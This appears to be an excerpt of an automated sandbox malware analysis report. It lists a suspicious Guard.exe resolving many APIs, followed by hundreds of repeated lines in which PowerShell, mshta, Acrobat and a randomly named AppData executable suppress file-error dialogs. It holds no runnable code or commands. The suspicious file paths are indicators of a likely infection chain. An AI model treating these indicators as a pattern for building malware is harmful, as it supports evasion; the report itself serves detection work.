Source: C:\Users\Public\Guard.exeCode function: 20_2_00ED33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,20_2_00ED33B7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
